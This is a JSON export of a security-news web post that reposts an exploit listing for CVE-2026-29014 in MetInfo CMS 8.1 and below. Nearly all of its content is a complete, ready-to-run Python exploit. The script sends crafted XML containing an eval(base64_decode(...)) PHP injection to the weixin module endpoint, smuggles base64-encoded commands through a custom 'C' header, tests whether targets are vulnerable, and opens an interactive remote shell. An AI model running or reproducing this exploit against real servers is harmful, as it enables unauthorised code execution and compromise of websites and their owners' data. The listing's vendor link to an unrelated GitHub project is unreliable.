{"id":49290,"date":"2026-04-24T16:47:52","date_gmt":"2026-04-24T16:47:52","guid":{"rendered":"http:\/\/localhost\/?p=49290"},"modified":"2026-04-24T16:47:52","modified_gmt":"2026-04-24T16:47:52","slug":"metinfo-cms-81-php-code-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=49290","title":{"rendered":"\ud83d\udcc4 MetInfo CMS 8.1 PHP Code Injection_PACKETSTORM:219760"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-24T20:46:10&#8243;,&#8221;description&#8221;:&#8221;This Python script is a full remote code execution exploit suite targeting a vulnerability in MetInfo CMS versions 8.1 and below. The flaw resides in the weixin module handling logic, where improperly sanitized input allows PHP code injection via&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-24T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-24T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 MetInfo CMS 8.1 PHP Code Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:219760&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-29014&#8243;],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================\\n    | # Title     : MetInfo CMS 8.1 PHP Code Injection RCE Exploit                                                                   |\\n    | # Author    : indoushka                                                                                                        |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\\n    | # Vendor    : https:\/\/github.com\/facebookincubator\/below                                                                       |\\n    ==================================================================================================================================\\n    \\n    [+] Summary    : This Python script is a full remote code execution (RCE) exploit suite targeting a vulnerability in MetInfo CMS (\u2264 8.1), identified as CVE-2026-29014. \\n                     The flaw resides in the weixin module handling logic, where improperly sanitized input allows PHP code injection via crafted XML and HTTP parameters\/headers.\\n    \\n    \\n    [+] POC        :  \\n    \\n    #!\/usr\/bin\/env python3\\n    \\n    import requests\\n    import sys\\n    import argparse\\n    import base64\\n    import re\\n    import time\\n    import random\\n    import string\\n    from urllib.parse import urljoin\\n    from threading import Thread\\n    import socket\\n    import telnetlib\\n    \\n    import urllib3\\n    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n    \\n    BANNER = \\&#8221;\\&#8221;\\&#8221;\\n    \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n    \u2551  CVE-2026-29014 &#8211; MetInfo CMS PHP Code Injection by indoushka             \u2551\\n    \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n    \\&#8221;\\&#8221;\\&#8221;\\n    \\n    \\n    class MetInfoExploit:\\n        def __init__(self, target_url, proxy=None, timeout=30, verbose=False):\\n            self.target_url = target_url.rstrip(&#8216;\/&#8217;)\\n            self.timeout = timeout\\n            self.verbose = verbose\\n            self.session = requests.Session()\\n            self.session.verify = False\\n            self.vuln_path = \\&#8221;\/app\/system\/entrance.php\\&#8221;\\n            self.params = {\\n                &#8216;n&#8217;: &#8216;include&#8217;,\\n                &#8216;m&#8217;: &#8216;module&#8217;,\\n                &#8216;c&#8217;: &#8216;weixin&#8217;,\\n                &#8216;a&#8217;: &#8216;doapi&#8217;\\n            }\\n            self.injection_header = None\\n            self.webshell_url = None\\n    \\n            if proxy:\\n                self.session.proxies = {&#8216;http&#8217;: proxy, &#8216;https&#8217;: proxy}\\n    \\n        def log(self, msg, level=\\&#8221;[+]\\&#8221;):\\n            if self.verbose or level in [\\&#8221;[+]\\&#8221;, \\&#8221;[!]\\&#8221;, \\&#8221;[-]\\&#8221;]:\\n                print(f\\&#8221;{level} {msg}\\&#8221;)\\n    \\n        def trigger_cache_write(self):\\n            \\&#8221;\\&#8221;\\&#8221;Trigger initial cache write\\&#8221;\\&#8221;\\&#8221;\\n            self.log(\\&#8221;Triggering initial cache write&#8230;\\&#8221;)\\n    \\n            payload = &#8221;&#8217;\\u003cx\\u003e\\n    \\u003cMsgType\\u003eevent\\u003c\/MsgType\\u003e\\n    \\u003cEvent\\u003eSCAN\\u003c\/Event\\u003e\\n    \\u003cEventKey\\u003eadminlogin\\u0026#x26;..\/config\/tables\\u003c\/EventKey\\u003e\\n    \\u003cFromUserName\\u003e{${eval(base64_decode($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(67)]))}}{${die()}}\\u003c\/FromUserName\\u003e\\n    \\u003c\/x\\u003e&#8221;&#8217;\\n    \\n            url = urljoin(self.target_url, self.vuln_path)\\n    \\n            try:\\n                response = self.session.post(\\n                    url,\\n                    params=self.params,\\n                    data=payload,\\n                    headers={&#8216;Content-Type&#8217;: &#8216;application\/xml&#8217;},\\n                    timeout=self.timeout\\n                )\\n    \\n                return response.status_code == 200\\n    \\n            except requests.exceptions.RequestException:\\n                return False\\n    \\n        def build_php_payload(self, cmd, php_func=&#8217;passthru&#8217;):\\n            b64_cmd = base64.b64encode(cmd.encode()).decode()\\n            php_code = f\\&#8221;chdir(&#8216;..\/..&#8217;);print(&#8216;_____&#8217;);{php_func}(base64_decode(&#8216;{b64_cmd}&#8217;));print(&#8216;_____&#8217;);\\&#8221;\\n            return base64.b64encode(php_code.encode()).decode()\\n    \\n        def execute_command(self, cmd, php_func=&#8217;passthru&#8217;):\\n            self.trigger_cache_write()\\n    \\n            b64_payload = self.build_php_payload(cmd, php_func)\\n            self.injection_header = f\\&#8221;C: {b64_payload}\\&#8221;\\n    \\n            payload = &#8221;&#8217;\\u003cx\\u003e\\n    \\u003cMsgType\\u003eevent\\u003c\/MsgType\\u003e\\n    \\u003cEvent\\u003eSCAN\\u003c\/Event\\u003e\\n    \\u003cEventKey\\u003eadminlogin\\u0026#x26;Array\\u003c\/EventKey\\u003e\\n    \\u003cFromUserName\\u003etest\\u003c\/FromUserName\\u003e\\n    \\u003c\/x\\u003e&#8221;&#8217;\\n    \\n            url = urljoin(self.target_url, self.vuln_path)\\n    \\n            try:\\n                response = self.session.post(\\n                    url,\\n                    params=self.params,\\n                    data=payload,\\n                    headers={\\n                        &#8216;Content-Type&#8217;: &#8216;application\/xml&#8217;,\\n                        &#8216;C&#8217;: self.injection_header\\n                    },\\n                    timeout=self.timeout\\n                )\\n    \\n                if response.status_code == 200:\\n                    match = re.search(r&#8217;_____(.*?)_____&#8217;, response.text, re.DOTALL)\\n                    if match:\\n                        return match.group(1).strip()\\n                    return response.text.strip()\\n    \\n            except requests.exceptions.RequestException:\\n                pass\\n    \\n            return None\\n    \\n        def check_vulnerability(self):\\n            self.log(\\&#8221;Checking vulnerability&#8230;\\&#8221;)\\n    \\n            test = self.execute_command(\\&#8221;echo CVE_2026_29014_TEST\\&#8221;)\\n    \\n            if test and \\&#8221;CVE_2026_29014_TEST\\&#8221; in test:\\n                self.log(\\&#8221;VULNERABLE!\\&#8221;, \\&#8221;[+]\\&#8221;)\\n                return True\\n    \\n            self.log(\\&#8221;Not vulnerable\\&#8221;, \\&#8221;[-]\\&#8221;)\\n            return False\\n    \\n        def interactive_shell(self):\\n            while True:\\n                try:\\n                    cmd = input(\\&#8221;shell# \\&#8221;).strip()\\n                    if cmd in [\\&#8221;exit\\&#8221;, \\&#8221;quit\\&#8221;]:\\n                        break\\n    \\n                    result = self.execute_command(cmd)\\n                    print(result if result else \\&#8221;[no output]\\&#8221;)\\n    \\n                except KeyboardInterrupt:\\n                    break\\n    \\n    \\n    def exploit_metinfo_rce(target_url, cmd=None, interactive=False,\\n                            proxy=None, verbose=False):\\n    \\n        exploit = MetInfoExploit(target_url, proxy, verbose=verbose)\\n    \\n        if not exploit.check_vulnerability():\\n            return False\\n    \\n        if cmd:\\n            print(exploit.execute_command(cmd))\\n            return True\\n    \\n        if interactive:\\n            exploit.interactive_shell()\\n    \\n        return True\\n    \\n    \\n    def main():\\n        parser = argparse.ArgumentParser()\\n        parser.add_argument(&#8216;-u&#8217;, &#8216;&#8211;url&#8217;, required=True)\\n        parser.add_argument(&#8216;-c&#8217;, &#8216;&#8211;command&#8217;)\\n        parser.add_argument(&#8216;-i&#8217;, &#8216;&#8211;interactive&#8217;, action=&#8217;store_true&#8217;)\\n        parser.add_argument(&#8216;&#8211;proxy&#8217;)\\n        parser.add_argument(&#8216;-v&#8217;, &#8216;&#8211;verbose&#8217;, action=&#8217;store_true&#8217;)\\n    \\n        args = parser.parse_args()\\n    \\n        print(BANNER)\\n    \\n        exploit_metinfo_rce(\\n            target_url=args.url,\\n            cmd=args.command,\\n            interactive=args.interactive,\\n            proxy=args.proxy,\\n            verbose=args.verbose\\n        )\\n    \\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        main()\\n    \\t\\n    Greetings to :==============================================================================\\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n    ============================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/219760&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/219760\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-24T20:46:10&#8243;,&#8221;description&#8221;:&#8221;This Python script is a full remote code execution exploit suite targeting a vulnerability in MetInfo CMS versions 8.1 and below. The flaw resides in&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-49290","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 MetInfo CMS 8.1 PHP Code Injection_PACKETSTORM:219760 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=49290\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 MetInfo CMS 8.1 PHP Code Injection_PACKETSTORM:219760 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-24T20:46:10&#8243;,&#8221;description&#8221;:&#8221;This Python script is a full remote code execution exploit suite targeting a vulnerability in MetInfo CMS versions 8.1 and below. The flaw resides in...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=49290\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-24T16:47:52+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49290#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49290\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 MetInfo CMS 8.1 PHP Code Injection_PACKETSTORM:219760\",\"datePublished\":\"2026-04-24T16:47:52+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49290\"},\"wordCount\":1045,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=49290#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49290\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49290\",\"name\":\"\ud83d\udcc4 MetInfo CMS 8.1 PHP Code Injection_PACKETSTORM:219760 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-24T16:47:52+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49290#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=49290\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49290#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 MetInfo CMS 8.1 PHP Code Injection_PACKETSTORM:219760\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 MetInfo CMS 8.1 PHP Code Injection_PACKETSTORM:219760 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=49290","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 MetInfo CMS 8.1 PHP Code Injection_PACKETSTORM:219760 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-24T20:46:10&#8243;,&#8221;description&#8221;:&#8221;This Python script is a full remote code execution exploit suite targeting a vulnerability in MetInfo CMS versions 8.1 and below. The flaw resides in...","og_url":"https:\/\/zero.redgem.net\/?p=49290","og_site_name":"zero redgem","article_published_time":"2026-04-24T16:47:52+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=49290#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=49290"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 MetInfo CMS 8.1 PHP Code Injection_PACKETSTORM:219760","datePublished":"2026-04-24T16:47:52+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=49290"},"wordCount":1045,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=49290#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=49290","url":"https:\/\/zero.redgem.net\/?p=49290","name":"\ud83d\udcc4 MetInfo CMS 8.1 PHP Code Injection_PACKETSTORM:219760 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-24T16:47:52+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=49290#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=49290"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=49290#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 MetInfo CMS 8.1 PHP Code Injection_PACKETSTORM:219760"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/49290","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=49290"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/49290\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=49290"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=49290"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=49290"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}